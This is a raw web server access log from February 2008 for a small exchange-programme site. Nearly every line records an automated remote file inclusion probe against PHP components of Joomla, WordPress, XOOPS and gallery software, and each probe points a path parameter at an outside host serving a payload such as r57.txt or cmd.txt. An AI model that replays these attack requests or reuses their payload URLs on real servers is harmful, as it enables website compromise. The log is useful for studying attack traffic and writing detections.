83.138.141.146 - - [10/Feb/2008:17:52:58 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:53:25 -0800] "GET /logs/access_080107.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:54:42 -0800] "GET /logs/access_071119.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:54:42 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:17:54:51 -0800] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
86.64.194.71 - - [10/Feb/2008:17:55:15 -0800] "GET /logs/access_071231.log//appserv/main.php?appserv_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:17:59:34 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:18:00:22 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:00:53 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:18:02:26 -0800] "GET /logs/access_071231.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:18:04:44 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:18:04:44 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:18:05:10 -0800] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:18:06:17 -0800] "GET /logs/access_080127.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.224.20 - - [10/Feb/2008:18:12:33 -0800] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
62.193.224.20 - - [10/Feb/2008:18:12:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
62.193.224.20 - - [10/Feb/2008:18:12:33 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
62.193.224.20 - - [10/Feb/2008:18:12:39 -0800] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:15 -0800] "GET /logs/access_071217.log//include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:16 -0800] "GET /logs/access_071217.log//include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:16 -0800] "GET //include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:16 -0800] "GET //include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:16 -0800] "GET /logs//include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.75.35.118 - - [10/Feb/2008:18:13:16 -0800] "GET /logs//include.php?path[docroot]=http://sarion.info/m/common/com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.193.224.20 - - [10/Feb/2008:18:14:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:18:14:12 -0800] "GET /logs/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.160.42.74 - - [10/Feb/2008:18:14:12 -0800] "GET /includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:15:05 -0800] "GET /logs/access_080114.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:15:06 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:15:40 -0800] "GET /logs/access_080114.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:15:40 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.80.123.56 - - [10/Feb/2008:18:16:14 -0800] "GET /index.php?path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:17:01 -0800] "GET /logs/access_071126.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.55.35.10 - - [10/Feb/2008:18:17:18 -0800] "GET /logs/access_071126.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
83.138.141.146 - - [10/Feb/2008:18:19:01 -0800] "GET /logs/access_080127.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://59.127.40.143//appserv/atk.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
194.116.187.14 - - [10/Feb/2008:18:19:36 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tukangbecak.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:18:21:24 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:18:21:24 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:18:21:24 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.225.219.10 - - [10/Feb/2008:18:22:00 -0800] "GET /index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
77.91.224.18 - - [10/Feb/2008:18:22:57 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
77.91.224.18 - - [10/Feb/2008:18:22:57 -0800] "GET / HTTP/1.1" 200 919 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:18:24:00 -0800] "GET /logs/access_080127.log/home.php?inc=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:18:24:01 -0800] "GET /home.php?inc=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:18:24:01 -0800] "GET /logs/home.php?inc=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.186.169.183 - - [10/Feb/2008:18:31:53 -0800] "GET /home.php?inc=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
61.152.158.46 - - [10/Feb/2008:18:32:48 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:34:38 -0800] "GET /logs/access_071022.log//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:34:38 -0800] "GET //index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:34:38 -0800] "GET /logs//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:34:41 -0800] "GET /logs/access_071015.log//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.15.147.244 - - [10/Feb/2008:18:35:42 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.80.123.56 - - [10/Feb/2008:18:39:24 -0800] "GET /logs/access_071210.log/index.php?path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.80.123.56 - - [10/Feb/2008:18:39:25 -0800] "GET /logs/index.php?path=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.225.219.10 - - [10/Feb/2008:18:39:39 -0800] "GET /logs/access_071210.log/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.225.219.10 - - [10/Feb/2008:18:39:39 -0800] "GET /logs/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.186.169.183 - - [10/Feb/2008:18:41:04 -0800] "GET /logs/access_080127.log/home.php?inc=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
208.186.169.183 - - [10/Feb/2008:18:41:05 -0800] "GET /logs/home.php?inc=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:43:04 -0800] "GET /logs/access_071022.log//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:43:06 -0800] "GET //index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:43:06 -0800] "GET /logs//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:43:16 -0800] "GET /logs/access_071015.log//index.php?body=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.225.219.10 - - [10/Feb/2008:18:46:54 -0800] "GET /logs/access_080107.log/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:49:52 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:49:52 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:49:52 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.168.176.11 - - [10/Feb/2008:18:53:17 -0800] "GET /index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:18:54:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:54:54 -0800] "GET /logs/access.log/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:54:56 -0800] "GET /principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:54:58 -0800] "GET /logs/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:18:55:22 -0800] "GET /logs/access_071203.log/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:18:55:58 -0800] "GET /logs/access_071231.log//ws/get_events.php?includedir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:18:56:02 -0800] "GET //ws/get_events.php?includedir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:56:02 -0800] "GET /logs/access.log/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:56:03 -0800] "GET /principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:56:03 -0800] "GET /logs/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.44.240.103 - - [10/Feb/2008:18:56:06 -0800] "GET /logs/access_071203.log/principal.php?viewpage=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:18:56:56 -0800] "GET /logs/access.log/principal.php?viewpage=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:18:56:58 -0800] "GET /principal.php?viewpage=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:18:57:01 -0800] "GET /logs/principal.php?viewpage=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:18:57:37 -0800] "GET /logs/access_071203.log/principal.php?viewpage=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:00:29 -0800] "GET /logs/access_071105.log//index.php?body=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:00:31 -0800] "GET //index.php?body=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:00:33 -0800] "GET /logs//index.php?body=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:38 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:38 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:38 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:40 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:41 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:00:44 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
83.172.150.28 - - [10/Feb/2008:19:01:31 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_akobook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
83.172.150.28 - - [10/Feb/2008:19:01:31 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_akobook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:01:33 -0800] "GET /logs/access_071022.log//index.php?body=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.146.33.210 - - [10/Feb/2008:19:02:57 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_akobook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.advancedbreastcare.com.au/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.toulouseangloexchange.com"
82.146.33.210 - - [10/Feb/2008:19:02:58 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_akobook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.advancedbreastcare.com.au/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
83.172.150.28 - - [10/Feb/2008:19:03:38 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_akolegal&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.toulouseangloexchange.com"
83.172.150.28 - - [10/Feb/2008:19:03:39 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_akolegal&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
82.146.33.210 - - [10/Feb/2008:19:05:06 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_akolegal&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.advancedbreastcare.com.au/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
82.146.33.210 - - [10/Feb/2008:19:05:06 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_akolegal&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.advancedbreastcare.com.au/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:19:08:12 -0800] "GET /logs/access_080127.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:19:08:25 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
